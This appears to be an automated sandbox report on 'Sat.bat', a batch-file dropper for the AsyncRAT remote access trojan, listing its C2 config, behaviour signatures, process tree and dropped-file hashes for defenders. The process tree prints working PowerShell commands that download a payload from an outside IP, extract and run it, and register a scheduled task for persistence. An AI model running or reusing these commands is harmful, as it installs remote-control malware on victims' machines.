Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 10:38

General

  • Target

    Sat.bat

  • Size

    2KB

  • MD5

    0e2fff554ddadc58aaff7978ec06aa32

  • SHA1

    b453b17905235ea96150c90711285f7879d3afc0

  • SHA256

    64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80

  • SHA512

    c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://109.199.101.109:770/xx.jpg

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

Default

C2

samsalah1.freeddns.org:1005

Mutex

AsyncMutex_alosh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Start PowerShell.

  • Suspicious use of SetThreadContext 40 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3556
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4492
        • C:\Windows\system32\timeout.exe
          timeout /t 5 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:3420
        • C:\Users\Admin\Documents\AutoHotkey64.exe
          "C:\Users\Admin\Documents\AutoHotkey64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:3004
        • C:\Users\Admin\Documents\AutoHotkey64.exe
          "C:\Users\Admin\Documents\AutoHotkey64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:884
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:396
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4904
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3044
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2748
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:752
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:312
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3452
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2268
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2632
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            5⤵
              PID:1780
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2500
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              5⤵
                PID:1884
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1648
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                5⤵
                  PID:4916
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3504
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1188
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:5024
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:748
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4348
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                  5⤵
                    PID:4092
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3376
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4780
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2028
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1760
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4536
                • C:\Users\Admin\Documents\AutoHotkey64.exe
                  "C:\Users\Admin\Documents\AutoHotkey64.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:2524
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    5⤵
                      PID:2052
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      5⤵
                        PID:4844
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:1276
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:1128
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2224
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                        5⤵
                          PID:1616
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:4484
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                          5⤵
                            PID:3660
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:1112
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:2640
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:2772
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:4296
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:4840
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                            5⤵
                              PID:5104
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:4324
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:3524
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:3864
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:3724
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              5⤵
                                PID:2456
                            • C:\Windows\system32\schtasks.exe
                              schtasks /Query /TN "alosh"
                              4⤵
                                PID:2636
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -Command "$tr = New-Object -ComObject Schedule.Service; " "$tr.Connect(); " "$ta = $tr.NewTask(0); " "$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; " "$ta.Settings.Enabled = $true; " "$ta.Settings.DisallowStartIfOnBatteries = $false; " "$st = $ta.Triggers.Create(1); " "$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); " "$st.Repetition.Interval = 'PT2M'; " "$md = $ta.Actions.Create(0); " "$md.Path = 'C:\Users\Admin\\Documents\\AutoHotkey64.exe'; " "$ns = $tr.GetFolder('\'); " "$ns.RegisterTaskDefinition('alosh', $ta, 6, $null, $null, 3);"
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5032
                        • C:\Users\Admin\Documents\AutoHotkey64.exe
                          C:\Users\Admin\\Documents\\AutoHotkey64.exe
                          1⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:3116
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4768
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4940
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            2⤵
                              PID:4296
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              2⤵
                                PID:408
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:1872
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:3164
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2220
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2208

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                              Filesize

                              2KB

                              MD5

                              6cf293cb4d80be23433eecf74ddb5503

                              SHA1

                              24fe4752df102c2ef492954d6b046cb5512ad408

                              SHA256

                              b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                              SHA512

                              0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                              Filesize

                              425B

                              MD5

                              4eaca4566b22b01cd3bc115b9b0b2196

                              SHA1

                              e743e0792c19f71740416e7b3c061d9f1336bf94

                              SHA256

                              34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

                              SHA512

                              bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              64B

                              MD5

                              5caad758326454b5788ec35315c4c304

                              SHA1

                              3aef8dba8042662a7fcf97e51047dc636b4d4724

                              SHA256

                              83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                              SHA512

                              4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              1KB

                              MD5

                              1dffbab5ecc6d06e8b259ad505a0dc2a

                              SHA1

                              0938ec61e4af55d7ee9d12708fdc55c72ccb090c

                              SHA256

                              a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

                              SHA512

                              93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              1KB

                              MD5

                              667ff01c034bb4e8ba16f53d3541d5ec

                              SHA1

                              fb45ca467823e659500bc0e22d41ec43ef97bac7

                              SHA256

                              252a3bfca2435738b1690e19145fcc951a156f669067b23d60126012ab1398ff

                              SHA512

                              ca62c7f67f600accccf826cb394ffc7d6ee5afdc2aa4c058521eafe058de68ff7de8161cef9e40d4cf83160d69df3973d2eab982411a263f1bbe60b1173691b6

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sw5e0tsd.ut2.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\Documents\A.txt

                              Filesize

                              270KB

                              MD5

                              fcb797ad5f0600fabe1f0f32ea35063a

                              SHA1

                              c869826b399026e6a394f260f697f7daae4b30f6

                              SHA256

                              dd354350e31dd582e3060e1d9e7fc89d5eee5d6af36178095ade798b5f7715ad

                              SHA512

                              e5750c59aead966926ace3a71b66fa1710930c9e2ac0a08766be63302f8d09ffaf0a4549de016d1297ba52066409814518a83d68e818f26fb94fb0c5551c4623

                            • C:\Users\Admin\Documents\AutoHotkey64.ahk

                              Filesize

                              6KB

                              MD5

                              65bd377a23adf5d7d3f8d902d3fcead2

                              SHA1

                              570381a1edc203245fa6ff087efaed510a52e16d

                              SHA256

                              6bd2a145c7017b2ee3434f4893f497999d2bd11818a56794a4b6df04c0cc6120

                              SHA512

                              63de2c32dc2ac8098796fba837c3ccd93ad91af293e3add8cde56e5a2d70426d83a2b88ffcc3d2c02d3a895c2f1e3502bae405db0047f0267549075a0187c236

                            • C:\Users\Admin\Documents\AutoHotkey64.exe

                              Filesize

                              1.2MB

                              MD5

                              e92a3d6ca4bde49c6f0e1e343fdae44e

                              SHA1

                              02c27d2e076a19f54b133bb9c57b457b242d4116

                              SHA256

                              16109cec66cf252e5b851739bc9f7639a1802a0c3998b3829950e52911ca6599

                              SHA512

                              19df941ca771a23756936c0ee08fd5a9218784f2712c5735245aeacb532e46215654e4ddf83fbdd4b4d6a1aac3fb2a95119d883f4b3229cc7a4c690b197e24e7

                            • C:\Users\Admin\Documents\x.zip

                              Filesize

                              648KB

                              MD5

                              134af0f2fc2a9cd8976a242b81f8840f

                              SHA1

                              8a7acfbe935abd112af0b4eb77dc87ba595f64a5

                              SHA256

                              0268871620a416498e385020574721680eae7a9d887eb995fc6d3fef61d568d8

                              SHA512

                              b711acabe2dd8223accb1571f2c68d099f0977d350df4cf74b969e9b4a6fe1a563ff91cf8f81105ab3e6a94d973f6bded067e22b81192dc04ceff4212057169c

                            • memory/396-84-0x0000000005CD0000-0x0000000005D6C000-memory.dmp

                              Filesize

                              624KB

                            • memory/396-71-0x0000000000400000-0x0000000000416000-memory.dmp

                              Filesize

                              88KB

                            • memory/396-85-0x0000000006320000-0x00000000068C4000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/396-86-0x0000000005DE0000-0x0000000005E46000-memory.dmp

                              Filesize

                              408KB

                            • memory/1508-11-0x00007FFD35F40000-0x00007FFD36A01000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/1508-0-0x00007FFD35F43000-0x00007FFD35F45000-memory.dmp

                              Filesize

                              8KB

                            • memory/1508-12-0x00007FFD35F40000-0x00007FFD36A01000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/1508-15-0x00007FFD35F40000-0x00007FFD36A01000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/1508-1-0x00000224E6AD0000-0x00000224E6AF2000-memory.dmp

                              Filesize

                              136KB

                            • memory/3556-27-0x00007FFD35F40000-0x00007FFD36A01000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3556-17-0x00007FFD35F40000-0x00007FFD36A01000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3556-32-0x00007FFD35F40000-0x00007FFD36A01000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3556-29-0x00007FFD35F40000-0x00007FFD36A01000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4492-43-0x00000289B3A80000-0x00000289B3A92000-memory.dmp

                              Filesize

                              72KB

                            • memory/4492-44-0x00000289B3A70000-0x00000289B3A7A000-memory.dmp

                              Filesize

                              40KB